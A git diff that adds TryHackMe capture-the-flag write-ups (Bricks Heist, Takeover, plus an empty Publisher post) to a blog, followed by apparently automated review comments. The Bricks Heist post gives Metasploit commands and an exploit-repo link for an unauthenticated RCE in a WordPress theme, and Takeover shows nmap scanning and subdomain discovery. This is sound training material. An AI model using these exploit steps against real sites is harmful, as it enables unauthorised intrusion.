diff --git a/_posts/2024-9-10-tryhackme-publisher.md b/_posts/2024-9-10-tryhackme-publisher.md new file mode 100644 index 0000000..e20f15c --- /dev/null +++ b/_posts/2024-9-10-tryhackme-publisher.md @@ -0,0 +1,10 @@ +--- +title: 'TryHackMe: Publisher' +author: AmcaQt +categories: [TryHackMe] +tags: [web, enumeration, subdomain, subdomain takeover] +render_with_liquid: false +media_subpath: /images/thm_publisher/ +image: + path: room_card.png +--- \ No newline at end of file diff --git a/_posts/2024-9-5-tryhackme-bricks-heist.md b/_posts/2024-9-5-tryhackme-bricks-heist.md new file mode 100644 index 0000000..ce3eaab --- /dev/null +++ b/_posts/2024-9-5-tryhackme-bricks-heist.md 
@@ -0,0 +1,119 @@ +--- +title: 'TryHackMe: TryHack3M: Bricks Heist' +author: AmcaQt +categories: [TryHackMe] +tags: [web, enumeration, rce] +render_with_liquid: false +media_subpath: /images/thm_bricks_heist/ +image: + path: room_card.png +--- + +![Tryhackme Room Link](room_image.PNG){: width="600" height="150" .shadow } +__ + +## Description + +Brick Press Media Co. was working on creating a brand-new web theme that represents a renowned wall using three million byte bricks. Agent Murphy comes with a streak of bad luck. And here we go again: the server is compromised, and they've lost access. + +Can you hack back the server and identify what happened there? + +Note : Add `MACHINE_IP bricks.thm` to your /etc/hosts file. + +## Question & Flag + +### What is the content of the hidden .txt file in the web folder? + +First, before do further enumaration, let's run the basic scan with nmap + +![Nmap Scan](scan.PNG) + +Interesting find here, without wasting any time let's look further with [**WpScan**](https://www.kali.org/tools/wpscan/) + +![](2.PNG) + +The scan shows the site using Theme `bricks` with version `1.9.5`, after some research and finding we found the version is Vuln to Unauthenticated RCE + +![Remote Code Execution](3.PNG) + +The exploit and cve for the version is on github but i want to use metasploit to speed up the exploit +> https://github.com/K3ysTr0K3R/CVE-2024-25600-EXPLOIT + +Power up your msfconsole and search for bricks, you shall find the matching modules + +![](4.PNG) + +simply use command use 0 and fill in the require and you shall get the shell + +![](5.PNG) + +```Command +set LHOST 10.8.58.21 +set RHOSTS https://bricks.thm +set RPORT 443 +run +``` + +with that you may find the answer for Task 1 + +![](6.jpg) + +### What is the name of the suspicious process? & What is the service name affiliated with the suspicious process? 
+ +For this one go to google and do some research about it , then you'll found the command + +![](systemctl.PNG) + +get back to the terminal and try out the command + +![](7.PNG) + +but this is not the answer, let's try view the content of the service + +![](8.jpg) + +That's what we want + +### What is the log file name of the miner instance? + +Notice that the service is executing from `/lib/NetworkManager/` directory, go to that directory + +![](9.jpg) + +### What is the wallet address of the miner instance? & The wallet address used has been involved in transactions between wallets belonging to which threat group? + +Using the strings on the log file that we view earlier, try to decode with [**CyberChef**](https://gchq.github.io/CyberChef/) + +![](10.PNG) + +kinda lost on what that is, but since we searched about wallet address so i did some research + +![](wallet.PNG) + +so i need to confirm it, go to [**Blockchair**](https://blockchair.com/) , lucky it was the correct one, so i went down to the last payment received + +![](11.PNG) + +Inside that transaction history and from there, inside the privacy check + +![](12.PNG) + +We can see the details on the transaction + +![](13.PNG) + +Copy the sender address and search it on google, most of the result return `LockBit` + +> Source : +> +> https://ofac.treasury.gov/recent-actions/20240220 +> +> https://www.chainalysis.com/blog/lockbit-takedown-sanctions-february-2024/ + +## Conclusion + +This was fun Room and good for beginner to learn about `CVE` and how risky Outdated version of CMS such as `WordPress`. + +# Happy Hacking + +![Cute Gif](https://i.pinimg.com/originals/c6/ad/84/c6ad8481cee4f75d464b2a14040d06c9.gif) \ No newline at end of file diff --git a/_posts/2024-9-8-tryhackme-takeover.md b/_posts/2024-9-8-tryhackme-takeover.md new file mode 100644 index 0000000..9fb70fc --- /dev/null +++ b/_posts/2024-9-8-tryhackme-takeover.md 
@@ -0,0 +1,101 @@ +--- +title: 'TryHackMe: Takeover' +author: AmcaQt +categories: [TryHackMe] +tags: [web, enumeration, subdomain, subdomain takeover] +render_with_liquid: false +media_subpath: /images/thm_takeover/ +image: + path: room_card.png +--- + +![Tryhackme Room Link](room_image.PNG){: width="600" height="150" .shadow } +__ + +## Description + +Hello there, + +I am the CEO and one of the co-founders of futurevera.thm. In Futurevera, we believe that the future is in space. We do a lot of space research and write blogs about it. We used to help students with space questions, but we are rebuilding our support. + +Recently blackhat hackers approached us saying they could takeover and are asking us for a big ransom. Please help us to find what they can takeover. + +Our website is located at https://futurevera.thm + +Hint: Don't forget to add the MACHINE_IP in /etc/hosts for futurevera.thm ; ) + +## Basic Scan + +As usual we've been given a MACHINE_IP and need to put it on `/etc/hosts` with a named `futurevera.thm`. Lets run basic scan using Nmap + +```Nmap Scan +┌──(amca㉿amcaqt)-[~] +└─$ nmap -A -T5 futurevera.thm +Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-17 14:19 +08 +Warning: 10.10.200.103 giving up on port because retransmission cap hit (2). +Nmap scan report for futurevera.thm (10.10.200.103) +Host is up (0.20s latency). 
+Not shown: 910 closed tcp ports (conn-refused), 87 filtered tcp ports (no-response) +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 3072 dd:29:a7:0c:05:69:1f:f6:26:0a:d9:28:cd:40:f0:20 (RSA) +| 256 cb:2e:a8:6d:03:66:e9:70:eb:96:e1:f5:ba:25:cb:4e (ECDSA) +|_ 256 50:d3:4b:a8:a2:4d:1d:79:e1:7d:ac:bb:ff:0b:24:13 (ED25519) +80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) +|_http-title: Did not follow redirect to https://futurevera.thm/ +|_http-server-header: Apache/2.4.41 (Ubuntu) +443/tcp open ssl/http Apache httpd 2.4.41 +| ssl-cert: Subject: commonName=futurevera.thm/organizationName=Futurevera/stateOrProvinceName=Oregon/countryName=US +| Not valid before: 2022-03-13T10:05:19 +|_Not valid after: 2023-03-13T10:05:19 +|_http-title: FutureVera +|_http-server-header: Apache/2.4.41 (Ubuntu) +| tls-alpn: +|_ http/1.1 +|_ssl-date: TLS randomness does not represent time +Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +Nmap done: 1 IP address (1 host up) scanned in 44.43 seconds +``` + +We foundd that there's 3 open port which is : + +`22` ssh +`80` http +`443` ssl/http + +### Subdomain Enumaration + +#### First Subdomain + +The Description mention `support`, which I assume they have `support` as their subdomain, so lets add that in `/etc/hosts` and looks what we can find on that subdomain. View the subdomain on firefox and shall find this : + +![First Subdomain](1st-subdo.PNG) + +#### Second Subdomain + +By clicking the `View Cerificate` you shall find info about the subdomain `support.futurevera.thm`. If you a little lower you'll find Subject Alternative Names with DNS Names `s******************2.support.futurevera.htm` and as usual add the DNS Names in `/etc/hosts` + +![Second Subdomain](2nd-subdo.jpg) + +### What's the value of the flag? 
+ +By viewing the DNS Names on the browser you'll obtain the flag and will be redirect to [AWS Web Server](https://www.geeksforgeeks.org/aws-cloud-architecture-for-web-hosting/). + +![Flag](flag.jpg) + +### Conclusion + +This room was fun and very interesting, it made me search and try to understand what is `Subdomain takeover`, and learned something new with this room. + +If you want to learn more about `Subdomain Takeover` + +- [Book.Hacktricks.xyz](https://book.hacktricks.xyz/pentesting-web/domain-subdomain-takeover) +- [HackerOne](https://www.hackerone.com/application-security/guide-subdomain-takeovers) +- [Developer.Mozilla](https://developer.mozilla.org/en-US/docs/Web/Security/Subdomain_takeovers) + +## Happy Hacking + +![](https://media1.tenor.com/m/aXVFqv8KInAAAAAC/anime-frieren.gif){: width="600" height="150" .shadow } \ No newline at end of file
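Review bot: `_posts/2024-9-10-tryhackme-publisher.md` is committed as front matter only (`title`, `author`, `tags`, `image`) with no body and nothing marking it unfinished, so the next Jekyll build publishes an empty "TryHackMe: Publisher" page; add `published: false` to the front matter, or drop the file from this change until the write-up exists. The tag list `[web, enumeration, subdomain, subdomain takeover]` is copied verbatim from the Takeover post in the same change and is unlikely to describe the Publisher room, so set the tags when the content is written rather than inheriting them. The file also ends without a trailing newline (`\ No newline at end of file`).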
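Review bot: in `_posts/2024-9-5-tryhackme-bricks-heist.md` the vulnerability the whole room turns on is described only as "the version is Vuln to Unauthenticated RCE", with the CVE number appearing nowhere but inside the GitHub URL `K3ysTr0K3R/CVE-2024-25600-EXPLOIT`; state the identifier in the text next to "Theme `bricks` with version `1.9.5`" and link an advisory rather than only a third-party exploit repo. The process-hunting step ("go to google and do some research about it , then you'll found the command") keeps the actual `systemctl` command, the unit name and the service file path in screenshots (`systemctl.PNG`, `7.PNG`, `8.jpg`), so the text is neither searchable nor copyable; put the command and the `/lib/NetworkManager/` unit path in prose. In the Metasploit block, `set RHOSTS https://bricks.thm` together with `set RPORT 443` never sets `SSL`; either say that the URL form of `RHOSTS` is what selects TLS or add `set SSL true` so the sequence is reproducible, and tag the fence with `bash` or `text` instead of `Command`, which is not a highlighter language. Smaller style points: the `__` line under the room image is not a Markdown rule (`---` is), `# Happy Hacking` is an H1 above the post's own `##` sections while the Takeover post uses `## Happy Hacking`, and most images (`![](2.PNG)`, `![](4.PNG)`, ...) have empty alt text.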
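Review bot: in `_posts/2024-9-8-tryhackme-takeover.md` the second subdomain is written as `s******************2.support.futurevera.htm` while every other hostname in the post uses `.thm`; a reader who copies that name into `/etc/hosts` as instructed gets a host that never resolves to the box, so fix the TLD. The nmap run used `-T5` and the pasted output itself says `Warning: 10.10.200.103 giving up on port because retransmission cap hit (2).` with `87 filtered tcp ports (no-response)`, so the "3 open port" claim rests on an incomplete scan; re-run with `-T4` (or without `-T5`) before asserting the port list. The banner `Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-17` postdates the filename date `2024-9-8`, so one of the two is wrong. The flag section only says the hidden host "will be redirect to AWS Web Server" and links a general AWS hosting article; for a post tagged `subdomain takeover` and titled Takeover, show what the SAN name actually points to (`dig`/`host` output) and why that record is claimable, otherwise the takeover claim in the conclusion is unsupported. Typos to fix: "View Cerificate", "Subdomain Enumaration", "We foundd", "If you a little lower" (missing "scroll"), "will be redirect to" (redirected); the `__` line under the room image is not a Markdown rule, and `### Conclusion` here versus `## Conclusion` in the Bricks Heist post should use one level.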